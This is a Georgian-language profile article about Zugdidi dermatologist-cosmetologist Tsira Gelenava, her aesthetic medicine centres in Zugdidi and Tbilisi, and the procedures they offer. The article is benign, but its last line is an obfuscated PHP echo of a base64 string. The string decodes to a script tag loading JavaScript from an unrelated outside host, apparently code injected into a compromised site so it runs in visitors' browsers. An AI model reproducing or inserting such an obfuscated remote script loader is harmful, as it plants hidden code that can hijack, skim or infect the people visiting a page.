celsiusi
ავერსი შნაიდერი

დღეს გიყვებით ახალგაზრდა დერმატო - კოსმეტოლოგის შესახებ, რომელიც პაციენტების სილამაზესა და ჯანმრთელობაზე ზრუნავს.

ზუგდიდელმა ცირა გელენავამ მედიცინის სფერო ბავშობიდან აირჩია. ამიტომაც როგორც, თავად გვეუბნება, სხვა პროფესიაზე არასოდეს უფიქრია. სკოლის დამთავრების შემდეგ სურვილი რეალობად აქცია, თანაც საკმაოდ წარმატებულად.

როცა მრავალწლიანი აკადემიური და პრაქტიკული მუშაობის შედეგად მდიდარი გამოცდილება დაუგროვდა მშობლიურ ქალაქში, ზუგდიდში საკუთარი ესთეტიკური მედიცინის ცენტრი დააფუძნა. რამდენიმე წელიწადში კი ფილიალი თბილისშიც გახსნა.

სიამოვნებას ანიჭებს საქმე, რომელსაც უკვე 9 წელია აკეთებს.

358313554 295641693042971 5830256242191407401 n

მისი სამუშაო დღე დილის 9 საათზე, ზოგჯერ კი უფრო ადრეც იწყება და გვიან საღამომდე გრძელდება. დღეში საშუალოდ თხუთმეტამდე პაციენტს ემსახურება. მათგან ნაწილი აკნეს მკურნალობს, ნაწილი სხვადასხვა პროცედურებს იტარებს. ამბობს, რომ ამგვარი დატვირთვისთვის ყოველთვის მზადაა.

ცირას ყოველი დილა სხვადასხვა სამედიცინო ლიტერატურის გაცნობით იწყება, გვეუბნება, რომ ეს მისთვის ერთგვარი საგანმანათლებლო ლექციაა.

მის მიერ დაარსებული ესთეტიკური მედიცინის ცენტრი საზოგადოებს სთავაზობს ისეთ მნიშვნელოვან სერვისებს, როგორიცაა: აკნეს მკურნალობა, სახის წმენდა,პილინგი, ალმასური დერმაბრაზია, სახის ბიორემოდელირება, ბიორევიტალიზაცია თვალის ირგვლივ, ბოტოქსი, მეზოთერაპია, ბიორევიტალიზაცია, თმის მეზოთერაპია, წვრილი და ზედაპირული ნაოჭების გასწორება, ცხვირ-ტუჩის ნაოჭის შევსება, სახის კონტური/აღდგენა, ტუჩის აგუმენტაცია, პლაზმოთერაპია, ცხიმგროვების დაშლა სკლეროთერაპია და .ა შ.

ცირა ასევე არის ერთ - ერთი გამორჩეული პრეპარატის COLLOST- ის სამედიცინო მრჩეველი სამეგრელოს რეგიონში.

358242761 3451015605210429 7690139574576654510 n

ჩვენი რესპოდენტი გვიყვება, რომ სულ ახლის ძიებაშია და ბევრს სწავლობს, რადგან ძალიან უნდა, რომ თავისი პაციენტებისთვის კიდევ მეტი გააკეთოს.

მიუხედავად რთული სამუშაო რეჟიმისა, ის პროფესიული არჩევანით კმაყოფილია. ამბობს, რომ ეს სფერო ნამდვილად მისი საქმეა და რომ სხვაგვარად ვერც კი წარმოუდგენია.

358294815 842618197225288 4209136436388898376 n

ახალგაზრდა ექიმი აქტიურად მონაწილეობს ტრენინგებსა თუ კონფერენციებში მსოფლიოს სხვდასხვა ქვეყნებში.

მისივე განმარტებით, ესთეტიკურ მედიცინაში საერთაშორისო გაიდლაინების და პროტოკოლების ცოდნა აუცილებელია, თუმცა მთავარი მაინც პაციენტია და მნიშვნელოვანია საკუთარი გამოცდილება თითოეულ მათგანს მოარგო.

ცირა სამომავლოდ ესთეტიკური ცენტრის გაფართოებას და კიდევ ერთი ფილიალის გახსნას ბათუმში გეგმავს

,,ცირა გელენავას ესთეტიკური ცენტრის’’ მისამართებია: ზუგდიდი, გამსახურდიას № 𝟑𝟐, თბილისი - წერეთლის გამზირი №𝟐𝟕

 

https://www.facebook.com/drciragelenava

(R)

1235
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");